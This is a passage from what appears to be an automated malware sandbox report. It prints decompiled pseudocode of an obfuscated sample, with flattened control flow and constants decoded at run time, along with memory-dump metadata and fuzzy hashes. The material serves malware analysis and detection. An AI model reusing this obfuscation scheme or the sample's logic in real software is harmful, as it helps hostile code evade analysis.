                                                      						_t461 = 0x299f8b6c;
                                                      						goto L9;
                                                      					}
                                                      					if(_t461 == 0x1e33600c) {
                                                      						_v112 = 0x6c;
                                                      						_t391 =  *0x24ca20; // 0x0
                                                      						_t392 = E00238010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
                                                      						_t470 = _t470 + 0x20;
                                                      						if(_t392 == 0) {
                                                      							_t461 = 0x8f3e942;
                                                      							goto L9;
                                                      						}
                                                      						_t416 =  &_v1;
                                                      						_t448 = _t460;
                                                      						do {
                                                      							 *_t448 =  *_t416;
                                                      							_t448 = _t448 + 1;
                                                      							_t416 = _t416 - 1;
                                                      						} while (_t416 >=  &_v96);
                                                      						_t461 = 0x2e2d51e6;
                                                      						goto L9;
                                                      					}
                                                      					if(_t461 != 0x2452d659) {
                                                      						goto L29;
                                                      					}
                                                      					_t393 =  *0x24ca20; // 0x0
                                                      					_t395 = E00240A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
                                                      					_t470 = _t470 + 0x2c;
                                                      					asm("sbb esi, esi");
                                                      					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
                                                      					goto L9;
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                                      • API String ID: 0-11970308
                                                      • Opcode ID: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
                                                      • Instruction ID: a6e9b9997d9ff287688e68dd1a56c2e20396b586140668c3e912996a57acf700
                                                      • Opcode Fuzzy Hash: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
                                                      • Instruction Fuzzy Hash: 961245B25183808FD368CF25C989A4BBBF1BBC4314F108A1DF6D9862A0D7B59959CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00231CFA(void* __edx, intOrPtr* _a4) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				unsigned int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				signed int _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				unsigned int _v144;
                                                      				signed int _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				signed int _v192;
                                                      				signed int _v196;
                                                      				signed int _v200;
                                                      				signed int _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				signed int _v216;
                                                      				signed int _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				void* __ecx;
                                                      				void* _t496;
                                                      				void* _t539;
                                                      				intOrPtr _t544;
                                                      				intOrPtr _t546;
                                                      				signed int _t548;
                                                      				signed int _t551;
                                                      				intOrPtr _t552;
                                                      				intOrPtr _t554;
                                                      				signed int _t555;
                                                      				intOrPtr _t562;
                                                      				intOrPtr _t572;
                                                      				void* _t574;
                                                      				signed int _t577;
                                                      				signed int _t578;
                                                      				signed int _t579;
                                                      				signed int _t580;
                                                      				signed int _t581;
                                                      				signed int _t582;
                                                      				signed int _t583;
                                                      				signed int _t584;
                                                      				signed int _t585;
                                                      				signed int _t586;
                                                      				signed int _t587;
                                                      				signed int _t588;
                                                      				signed int _t589;
                                                      				signed int _t590;
                                                      				intOrPtr _t591;
                                                      				intOrPtr _t592;
                                                      				void* _t597;
                                                      				intOrPtr _t599;
                                                      				intOrPtr _t635;
                                                      				intOrPtr _t639;
                                                      				void* _t641;
                                                      				signed int* _t653;
                                                      				void* _t656;
                                                      
                                                      				_t575 = _a4;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0023602B(_t496);
                                                      				_v12 = 0x36bdff;
                                                      				_t653 =  &(( &_v228)[3]);
                                                      				_v8 = 0x3ff2a1;
                                                      				_t639 = 0;
                                                      				_v4 = 0;
                                                      				_v132 = 0xebdb;
                                                      				_t641 = 0x15e50797;
                                                      				_t577 = 0x54;
                                                      				_v132 = _v132 / _t577;
                                                      				_v132 = _v132 | 0x22f60655;
                                                      				_v132 = _v132 ^ 0x22f660d1;
                                                      				_v120 = 0xef02;
                                                      				_v120 = _v120 + 0xffff4354;
                                                      				_v120 = _v120 + 0xfbd6;
                                                      				_v120 = _v120 ^ 0x0001ae28;
                                                      				_v52 = 0x7417;
                                                      				_v52 = _v52 + 0x1179;
                                                      				_v52 = _v52 ^ 0x00000590;
                                                      				_v48 = 0x8f30;
                                                      				_v48 = _v48 >> 0xf;
                                                      				_v64 = 0xc7cd;
                                                      				_v64 = _v64 << 0xc;
                                                      				_v64 = _v64 ^ 0x0c7cd040;
                                                      				_v140 = 0xc967;
                                                      				_v140 = _v140 << 0xb;
                                                      				_v140 = _v140 | 0xe06bf9c9;
                                                      				_v140 = _v140 ^ 0x166bf9c9;
                                                      				_v196 = 0x461e;
                                                      				_v196 = _v196 | 0x6b692bd6;
                                                      				_v196 = _v196 + 0xc0cf;
                                                      				_v196 = _v196 + 0xffff0de4;
                                                      				_v196 = _v196 ^ 0x6b6977c5;
                                                      				_v180 = 0xfff7;
                                                      				_t578 = 0x59;
                                                      				_v180 = _v180 / _t578;
                                                      				_t579 = 0x4d;
                                                      				_v180 = _v180 * 0x18;
                                                      				_v180 = _v180 | 0x58a6a9da;
                                                      				_v180 = _v180 ^ 0x58a6c249;
                                                      				_v128 = 0x9f16;
                                                      				_v128 = _v128 ^ 0xdade8ffa;
                                                      				_v128 = _v128 ^ 0x4c90ffe3;
                                                      				_v128 = _v128 ^ 0x964ece00;
                                                      				_v92 = 0xcecd;
                                                      				_v92 = _v92 + 0x8237;
                                                      				_v92 = _v92 / _t579;
                                                      				_v92 = _v92 ^ 0x00006f99;
                                                      				_v100 = 0x1088;
                                                      				_v100 = _v100 << 8;
                                                      				_v100 = _v100 << 3;
                                                      				_v100 = _v100 ^ 0x0084674e;
                                                      				_v108 = 0x5533;
                                                      				_v108 = _v108 >> 9;
                                                      				_v108 = _v108 | 0xd8fb4233;
                                                      				_v108 = _v108 ^ 0xd8fb1bcd;
                                                      				_v208 = 0xcae;
                                                      				_v208 = _v208 / _t579;
                                                      				_t580 = 0x13;
                                                      				_v208 = _v208 / _t580;
                                                      				_v208 = _v208 >> 0xa;
                                                      				_v208 = _v208 ^ 0x00001a16;
                                                      				_v216 = 0x40e3;
                                                      				_v216 = _v216 | 0x810267c5;
                                                      				_v216 = _v216 << 1;
                                                      				_v216 = _v216 << 3;
                                                      				_v216 = _v216 ^ 0x10267eee;
                                                      				_v28 = 0xb673;
                                                      				_t581 = 0x3e;
                                                      				_v28 = _v28 / _t581;
                                                      				_v28 = _v28 ^ 0x0000683f;
                                                      				_v40 = 0x9279;
                                                      				_v40 = _v40 + 0xffffeab6;
                                                      				_v40 = _v40 ^ 0x000054a5;
                                                      				_v204 = 0x1c40;
                                                      				_v204 = _v204 + 0xffff1f7d;
                                                      				_t582 = 0x50;
                                                      				_v204 = _v204 / _t582;
                                                      				_v204 = _v204 ^ 0x72bb6b9a;
                                                      				_v204 = _v204 ^ 0x71887e03;
                                                      				_v112 = 0xb897;
                                                      				_v112 = _v112 + 0xffffdcba;
                                                      				_v112 = _v112 | 0x14aad9bd;
                                                      				_v112 = _v112 ^ 0x14aaad8a;
                                                      				_v172 = 0xd85f;
                                                      				_v172 = _v172 + 0xffff9181;
                                                      				_t583 = 0x36;
                                                      				_v172 = _v172 * 0x2e;
                                                      				_v172 = _v172 + 0x3c74;
                                                      				_v172 = _v172 ^ 0x00135ecd;
                                                      				_v212 = 0x19f7;
                                                      				_v212 = _v212 + 0xffff95e1;
                                                      				_v212 = _v212 | 0x04fc32b0;
                                                      				_v212 = _v212 << 0xa;
                                                      				_v212 = _v212 ^ 0xfeffe01a;
                                                      				_v36 = 0x7d37;
                                                      				_v36 = _v36 | 0x20ef5b1a;
                                                      				_v36 = _v36 ^ 0x20ef0402;
                                                      				_v116 = 0xd595;
                                                      				_v116 = _v116 / _t583;
                                                      				_v116 = _v116 + 0xffffe49c;
                                                      				_v116 = _v116 ^ 0xffffa94a;
                                                      				_v160 = 0x5e14;
                                                      				_v160 = _v160 | 0xdf0c29a2;
                                                      				_v160 = _v160 ^ 0xe579e09e;
                                                      				_v160 = _v160 + 0xffffde5a;
                                                      				_v160 = _v160 ^ 0x3a753154;
                                                      				_v68 = 0x52ff;
                                                      				_v68 = _v68 >> 8;
                                                      				_v68 = _v68 ^ 0x000014f4;
                                                      				_v76 = 0x7879;
                                                      				_t584 = 0x73;
                                                      				_v76 = _v76 / _t584;
                                                      				_v76 = _v76 ^ 0x0000054d;
                                                      				_v72 = 0x594e;
                                                      				_v72 = _v72 ^ 0x61e5003d;
                                                      				_v72 = _v72 ^ 0x61e57443;
                                                      				_v156 = 0xdc41;
                                                      				_v156 = _v156 << 6;
                                                      				_v156 = _v156 << 0x10;
                                                      				_v156 = _v156 ^ 0x10402e5f;
                                                      				_v152 = 0x2cab;
                                                      				_v152 = _v152 << 0xc;
                                                      				_v152 = _v152 ^ 0xa6d63634;
                                                      				_v152 = _v152 ^ 0xa41cdbd3;
                                                      				_v24 = 0xfca2;
                                                      				_v24 = _v24 >> 0xd;
                                                      				_v24 = _v24 ^ 0x000010c7;
                                                      				_v96 = 0xe6c1;
                                                      				_v96 = _v96 << 0xd;
                                                      				_v96 = _v96 + 0xc19f;
                                                      				_v96 = _v96 ^ 0x1cd8953a;
                                                      				_v224 = 0x49a1;
                                                      				_v224 = _v224 ^ 0xfe0521c0;
                                                      				_v224 = _v224 + 0x1e0d;
                                                      				_v224 = _v224 | 0x46707e16;
                                                      				_v224 = _v224 ^ 0xfe759897;
                                                      				_v228 = 0x2882;
                                                      				_v228 = _v228 << 0x10;
                                                      				_v228 = _v228 ^ 0x2e28bbbf;
                                                      				_v228 = _v228 | 0x3bec92e5;
                                                      				_v228 = _v228 ^ 0x3fee891d;
                                                      				_v136 = 0x5ad;
                                                      				_v136 = _v136 ^ 0x3d33a635;
                                                      				_v136 = _v136 + 0xffff9ac4;
                                                      				_v136 = _v136 ^ 0x3d335448;
                                                      				_v104 = 0x3c69;
                                                      				_v104 = _v104 + 0xf144;
                                                      				_t585 = 0x19;
                                                      				_v104 = _v104 * 0x1e;
                                                      				_v104 = _v104 ^ 0x0023546a;
                                                      				_v188 = 0xf300;
                                                      				_v188 = _v188 / _t585;
                                                      				_v188 = _v188 + 0xffffad26;
                                                      				_v188 = _v188 | 0x8105dcb8;
                                                      				_v188 = _v188 ^ 0xffffe238;
                                                      				_v144 = 0x45c8;
                                                      				_v144 = _v144 >> 0xe;
                                                      				_v144 = _v144 + 0x45b6;
                                                      				_v144 = _v144 ^ 0x000072cd;
                                                      				_v192 = 0xd236;
                                                      				_v192 = _v192 >> 0x10;
                                                      				_t586 = 0x69;
                                                      				_v192 = _v192 / _t586;
                                                      				_v192 = _v192 ^ 0x176600d6;
                                                      				_v192 = _v192 ^ 0x17663ad7;
                                                      				_v200 = 0x1b90;
                                                      				_v200 = _v200 >> 0xe;
                                                      				_v200 = _v200 | 0x00032953;
                                                      				_t587 = 0xe;
                                                      				_v200 = _v200 * 0x71;
                                                      				_v200 = _v200 ^ 0x016540c6;
                                                      				_v32 = 0xa5b;
                                                      				_v32 = _v32 / _t587;
                                                      				_v32 = _v32 ^ 0x00002bda;
                                                      				_v56 = 0xbe4e;
                                                      				_v56 = _v56 + 0xffffe059;
                                                      				_v56 = _v56 ^ 0x0000eaa3;
                                                      				_v220 = 0x4321;
                                                      				_v220 = _v220 ^ 0x3fa1daa1;
                                                      				_v220 = _v220 + 0xffff309f;
                                                      				_t588 = 0x24;
                                                      				_v220 = _v220 / _t588;
                                                      				_v220 = _v220 ^ 0x01c46047;
                                                      				_v164 = 0x3944;
                                                      				_v164 = _v164 + 0xffff1fd9;
                                                      				_t589 = 0x2b;
                                                      				_v164 = _v164 * 0x57;
                                                      				_v164 = _v164 << 4;
                                                      				_v164 = _v164 ^ 0xfc749d64;
                                                      				_v148 = 0x7755;
                                                      				_v148 = _v148 ^ 0x244775ea;
                                                      				_v148 = _v148 | 0xcd3e82a6;
                                                      				_v148 = _v148 ^ 0xed7f8152;
                                                      				_v88 = 0x40ad;
                                                      				_v88 = _v88 >> 0xf;
                                                      				_v88 = _v88 ^ 0x000030bd;
                                                      				_v80 = 0x9327;
                                                      				_v80 = _v80 * 0x70;
                                                      				_v80 = _v80 ^ 0x00406c8d;
                                                      				_v176 = 0x8ba8;
                                                      				_v176 = _v176 + 0x5748;
                                                      				_v176 = _v176 + 0xffffe08a;
                                                      				_v176 = _v176 + 0xffffcf91;
                                                      				_v176 = _v176 ^ 0x0000bf1e;
                                                      				_v124 = 0xe985;
                                                      				_v124 = _v124 ^ 0x9cf6d459;
                                                      				_v124 = _v124 + 0xffffb832;
                                                      				_v124 = _v124 ^ 0x9cf5d440;
                                                      				_v184 = 0xee13;
                                                      				_v184 = _v184 / _t589;
                                                      				_v184 = _v184 ^ 0x973ecc13;
                                                      				_t590 = 0x6a;
                                                      				_v184 = _v184 / _t590;
                                                      				_v184 = _v184 ^ 0x016d24ef;
                                                      				_v84 = 0xbcf1;
                                                      				_v84 = _v84 ^ 0x64b03ea8;
                                                      				_v84 = _v84 ^ 0x64b0e2a8;
                                                      				_v60 = 0x8a4f;
                                                      				_v60 = _v60 | 0x8c15d5a4;
                                                      				_v60 = _v60 ^ 0x8c14dfef;
                                                      				_v44 = 0x30ef;
                                                      				_v44 = _v44 + 0xffffe2a4;
                                                      				_v44 = _v44 ^ 0x00001380;
                                                      				_v168 = 0xbe5e;
                                                      				_v168 = _v168 << 0x10;
                                                      				_v168 = _v168 | 0x5aa68a8d;
                                                      				_v168 = _v168 + 0xffff34cf;
                                                      				_v168 = _v168 ^ 0xfefdbf5d;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t656 = _t641 - 0x2e2ba50c;
                                                      						if(_t656 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t656 == 0) {
                                                      							_push(_t590);
                                                      							_push(_t590);
                                                      							_t591 =  *0x24ca20; // 0x0
                                                      							_t590 = _t591 + 0x18;
                                                      							_t551 = E0023C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
                                                      							_t653 =  &(_t653[7]);
                                                      							asm("sbb esi, esi");
                                                      							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
                                                      							continue;
                                                      						} else {
                                                      							if(_t641 == 0xfdb1f24) {
                                                      								_t552 =  *0x24ca20; // 0x0
                                                      								_t554 =  *0x24ca20; // 0x0
                                                      								_t555 = E0023F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
                                                      								_t590 = _v224;
                                                      								asm("sbb esi, esi");
                                                      								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
                                                      								E00249465(_t590, _v20, _v228);
                                                      								_t653 =  &(_t653[0xa]);
                                                      								goto L27;
                                                      							} else {
                                                      								if(_t641 == 0x15e50797) {
                                                      									_push(_t590);
                                                      									_t597 = 0x34;
                                                      									_t562 = E00238736(_t597);
                                                      									 *0x24ca20 = _t562;
                                                      									_t590 = _t590;
                                                      									if(_t562 != 0) {
                                                      										_t641 = 0x2e2ba50c;
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									if(_t641 == 0x1af0d9d8) {
                                                      										_t599 =  *0x24ca20; // 0x0
                                                      										_t590 =  *(_t599 + 0x18);
                                                      										E002387FA(_t590);
                                                      										_t653 = _t653 - 0x10 + 0x10;
                                                      										_t641 = 0x3b32afa9;
                                                      										continue;
                                                      									} else {
                                                      										if(_t641 == 0x1f84fef1) {
                                                      											_t572 =  *0x24ca20; // 0x0
                                                      											_push(_t590);
                                                      											_push(_t590);
                                                      											E0024AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
                                                      											_t653 =  &(_t653[3]);
                                                      											_t641 = 0x1af0d9d8;
                                                      											continue;
                                                      										} else {
                                                      											if(_t641 != 0x2135b5bc) {
                                                      												goto L27;
                                                      											} else {
                                                      												_t635 =  *0x24ca20; // 0x0
                                                      												_t437 = _t635 + 0x2c; // 0x2c
                                                      												_t590 = _t437;
                                                      												_t574 = E00241A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
                                                      												_t653 =  &(_t653[8]);
                                                      												if(_t574 != 0) {
                                                      													_t639 = 1;
                                                      												} else {
                                                      													_t641 = 0x3151f296;
                                                      													continue;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L21:
                                                      						return _t639;
                                                      					}
                                                      					if(_t641 == 0x315000fd) {
                                                      						_t590 = _v36;
                                                      						_t539 = E002375AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
                                                      						_t653 =  &(_t653[0xb]);
                                                      						if(_t539 == 0) {
                                                      							_t641 = 0x1af0d9d8;
                                                      							goto L27;
                                                      						} else {
                                                      							_t641 = 0xfdb1f24;
                                                      							goto L1;
                                                      						}
                                                      					} else {
                                                      						if(_t641 == 0x3151f296) {
                                                      							_t544 =  *0x24ca20; // 0x0
                                                      							_push(_t590);
                                                      							_push(_t590);
                                                      							E0024AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
                                                      							_t653 =  &(_t653[3]);
                                                      							_t641 = 0x1f84fef1;
                                                      							goto L1;
                                                      						} else {
                                                      							if(_t641 == 0x353d4dc5) {
                                                      								_t546 =  *0x24ca20; // 0x0
                                                      								_t592 =  *0x24ca20; // 0x0
                                                      								_t590 =  *(_t592 + 0x18);
                                                      								_t548 = E002366C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
                                                      								_t653 =  &(_t653[6]);
                                                      								asm("sbb esi, esi");
                                                      								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
                                                      								goto L1;
                                                      							} else {
                                                      								if(_t641 != 0x3b32afa9) {
                                                      									goto L27;
                                                      								} else {
                                                      									E0023F536(_v92, _v100, _v108,  *0x24ca20);
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					goto L21;
                                                      					L27:
                                                      				} while (_t641 != 0x5edb69a);
                                                      				goto L21;
                                                      			}
































































































                                                      0x00231fed
                                                      0x00231ff8
                                                      0x00232003
                                                      0x0023200b
                                                      0x00232018
                                                      0x0023201b
                                                      0x0023201f
                                                      0x00232027
                                                      0x0023202f
                                                      0x00232037
                                                      0x0023203f
                                                      0x00232047
                                                      0x0023204c
                                                      0x00232054
                                                      0x0023205f
                                                      0x0023206a
                                                      0x00232075
                                                      0x0023208b
                                                      0x00232092
                                                      0x0023209d
                                                      0x002320a8
                                                      0x002320b0
                                                      0x002320b8
                                                      0x002320c0
                                                      0x002320c8
                                                      0x002320d0
                                                      0x002320db
                                                      0x002320e3
                                                      0x002320ee
                                                      0x00232100
                                                      0x00232103
                                                      0x0023210a
                                                      0x00232115
                                                      0x00232120
                                                      0x0023212d
                                                      0x00232138
                                                      0x00232140
                                                      0x00232145
                                                      0x0023214a
                                                      0x00232152
                                                      0x0023215a
                                                      0x0023215f
                                                      0x00232167
                                                      0x0023216f
                                                      0x0023217a
                                                      0x00232182
                                                      0x0023218d
                                                      0x00232198
                                                      0x002321a0
                                                      0x002321ab
                                                      0x002321b6
                                                      0x002321be
                                                      0x002321c6
                                                      0x002321ce
                                                      0x002321d6
                                                      0x002321de
                                                      0x002321e6
                                                      0x002321eb
                                                      0x002321f3
                                                      0x002321fb
                                                      0x00232203
                                                      0x0023220b
                                                      0x00232213
                                                      0x0023221b
                                                      0x00232223
                                                      0x0023222e
                                                      0x00232243
                                                      0x00232246
                                                      0x0023224d
                                                      0x00232258
                                                      0x00232268
                                                      0x0023226c
                                                      0x00232274
                                                      0x0023227c
                                                      0x00232284
                                                      0x0023228c
                                                      0x00232291
                                                      0x00232299
                                                      0x002322a1
                                                      0x002322a9
                                                      0x002322b2
                                                      0x002322b7
                                                      0x002322bd
                                                      0x002322c5
                                                      0x002322cd
                                                      0x002322d5
                                                      0x002322da
                                                      0x002322e7
                                                      0x002322e8
                                                      0x002322ec
                                                      0x002322f4
                                                      0x00232308
                                                      0x0023230f
                                                      0x0023231a
                                                      0x00232325
                                                      0x00232330
                                                      0x0023233b
                                                      0x00232343
                                                      0x0023234b
                                                      0x00232360
                                                      0x00232365
                                                      0x0023236b
                                                      0x00232373
                                                      0x0023237b
                                                      0x00232388
                                                      0x0023238b
                                                      0x0023238f
                                                      0x00232394
                                                      0x0023239c
                                                      0x002323a4
                                                      0x002323ac
                                                      0x002323b4
                                                      0x002323bc
                                                      0x002323c7
                                                      0x002323cf
                                                      0x002323da
                                                      0x002323ed
                                                      0x002323f4
                                                      0x002323ff
                                                      0x00232407
                                                      0x0023240f
                                                      0x00232417
                                                      0x0023241f
                                                      0x00232427
                                                      0x0023242f
                                                      0x00232437
                                                      0x0023243f
                                                      0x00232447
                                                      0x00232457
                                                      0x0023245b
                                                      0x00232467
                                                      0x0023246a
                                                      0x0023246e
                                                      0x00232476
                                                      0x00232481
                                                      0x0023248c
                                                      0x00232497
                                                      0x002324a2
                                                      0x002324ad
                                                      0x002324b8
                                                      0x002324c3
                                                      0x002324ce
                                                      0x002324d9
                                                      0x002324e1
                                                      0x002324e6
                                                      0x002324ee
                                                      0x002324f6
                                                      0x002324f6
                                                      0x002324fe
                                                      0x002324fe
                                                      0x002324fe
                                                      0x002324fe
                                                      0x00232504
                                                      0x00000000
                                                      0x00000000
                                                      0x0023250a
                                                      0x00232686
                                                      0x00232687
                                                      0x002326a7
                                                      0x002326b1
                                                      0x002326b4
                                                      0x002326b9
                                                      0x002326c0
                                                      0x002326c8
                                                      0x00000000
                                                      0x00232510
                                                      0x00232516
                                                      0x00232620
                                                      0x00232644
                                                      0x00232657
                                                      0x00232669
                                                      0x0023266f
                                                      0x00232677
                                                      0x00232679
                                                      0x0023267e
                                                      0x00000000
                                                      0x0023251c
                                                      0x00232522
                                                      0x002325f6
                                                      0x002325fa
                                                      0x002325fb
                                                      0x00232600
                                                      0x00232606
                                                      0x00232609
                                                      0x0023260f
                                                      0x00000000
                                                      0x0023260f
                                                      0x00232528
                                                      0x0023252a
                                                      0x002325cf
                                                      0x002325d5
                                                      0x002325d8
                                                      0x002325dd
                                                      0x002325e0
                                                      0x00000000
                                                      0x00232530
                                                      0x00232536
                                                      0x002325a0
                                                      0x002325a5
                                                      0x002325a6
                                                      0x002325aa
                                                      0x002325af
                                                      0x002325b2
                                                      0x00000000
                                                      0x00232538
                                                      0x0023253e
                                                      0x00000000
                                                      0x00232544
                                                      0x00232567
                                                      0x0023256d
                                                      0x0023256d
                                                      0x00232573
                                                      0x00232578
                                                      0x0023257d
                                                      0x0023282d
                                                      0x00232583
                                                      0x00232583
                                                      0x00000000
                                                      0x00232583
                                                      0x0023257d
                                                      0x0023253e
                                                      0x00232536
                                                      0x0023252a
                                                      0x00232522
                                                      0x00232516
                                                      0x00232721
                                                      0x0023272d
                                                      0x0023272d
                                                      0x002326d9
                                                      0x002327fb
                                                      0x00232802
                                                      0x00232807
                                                      0x0023280c
                                                      0x00232818
                                                      0x00000000
                                                      0x0023280e
                                                      0x0023280e
                                                      0x00000000
                                                      0x0023280e
                                                      0x002326df
                                                      0x002326e5
                                                      0x00232796
                                                      0x0023279b
                                                      0x0023279c
                                                      0x002327a0
                                                      0x002327a5
                                                      0x002327a8
                                                      0x00000000
                                                      0x002326eb
                                                      0x002326f1
                                                      0x00232744
                                                      0x0023275b
                                                      0x00232761
                                                      0x00232764
                                                      0x00232769
                                                      0x00232770
                                                      0x00232778
                                                      0x00000000
                                                      0x002326f3
                                                      0x002326f9
                                                      0x00000000
                                                      0x002326ff
                                                      0x0023271a
                                                      0x00232720
                                                      0x002326f9
                                                      0x002326f1
                                                      0x002326e5
                                                      0x00000000
                                                      0x0023281a
                                                      0x0023281a
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$t<$0$@$uG$
                                                      • API String ID: 0-1338720442
                                                      • Opcode ID: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
                                                      • Instruction ID: f9f00108a93da0cdfd006c6a4615d5512db971c54960b805ef79dd27e04c9a10
                                                      • Opcode Fuzzy Hash: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
                                                      • Instruction Fuzzy Hash: F1425671508381DFE3B8CF25C84AA9BBBE1BBC4304F10891DE5D9962A0D7B58859CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0024511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                      				char _v64;
                                                      				char _v128;
                                                      				signed int _v132;
                                                      				intOrPtr _v136;
                                                      				intOrPtr _v140;
                                                      				intOrPtr* _v144;
                                                      				char _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				unsigned int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				signed int _v192;
                                                      				signed int _v196;
                                                      				signed int _v200;
                                                      				signed int _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				signed int _v216;
                                                      				signed int _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				signed int _v232;
                                                      				signed int _v236;
                                                      				signed int _v240;
                                                      				signed int _v244;
                                                      				signed int _v248;
                                                      				signed int _v252;
                                                      				signed int _v256;
                                                      				signed int _v260;
                                                      				signed int _v264;
                                                      				signed int _v268;
                                                      				signed int _v272;
                                                      				signed int _v276;
                                                      				signed int _v280;
                                                      				signed int _v284;
                                                      				signed int _v288;
                                                      				signed int _v292;
                                                      				signed int _v296;
                                                      				signed int _v300;
                                                      				signed int _v304;
                                                      				unsigned int _v308;
                                                      				signed int _v312;
                                                      				signed int _v316;
                                                      				signed int _t462;
                                                      				intOrPtr* _t466;
                                                      				signed int _t513;
                                                      				signed int _t514;
                                                      				signed int _t515;
                                                      				signed int _t516;
                                                      				signed int _t517;
                                                      				signed int _t518;
                                                      				signed int _t519;
                                                      				signed int _t520;
                                                      				intOrPtr _t521;
                                                      				void* _t522;
                                                      				void* _t525;
                                                      				void* _t528;
                                                      				intOrPtr* _t531;
                                                      				signed int* _t532;
                                                      
                                                      				_t466 = __ecx;
                                                      				_t532 =  &_v316;
                                                      				_v140 = __edx;
                                                      				_v144 = __ecx;
                                                      				_v132 = _v132 & 0x00000000;
                                                      				_v136 = 0x75b778;
                                                      				_v308 = 0x9968;
                                                      				_v308 = _v308 | 0x0cfdc455;
                                                      				_v308 = _v308 + 0xdd4c;
                                                      				_v308 = _v308 >> 3;
                                                      				_v308 = _v308 ^ 0x019fad6f;
                                                      				_v172 = 0xa03a;
                                                      				_v172 = _v172 >> 8;
                                                      				_v172 = _v172 ^ 0x00000391;
                                                      				_v228 = 0x2930;
                                                      				_v228 = _v228 << 0xc;
                                                      				_v228 = _v228 ^ 0x02930f5f;
                                                      				_v220 = 0x5883;
                                                      				_v220 = _v220 + 0xffff1c36;
                                                      				_v220 = _v220 ^ 0xffff6a37;
                                                      				_v288 = 0x122f;
                                                      				_v288 = _v288 << 0xf;
                                                      				_v288 = _v288 + 0xd44b;
                                                      				_v288 = _v288 << 0xa;
                                                      				_v288 = _v288 ^ 0x6151757c;
                                                      				_v260 = 0xc525;
                                                      				_v260 = _v260 << 0xa;
                                                      				_t522 = 0x1b8692db;
                                                      				_t513 = 0x61;
                                                      				_v260 = _v260 / _t513;
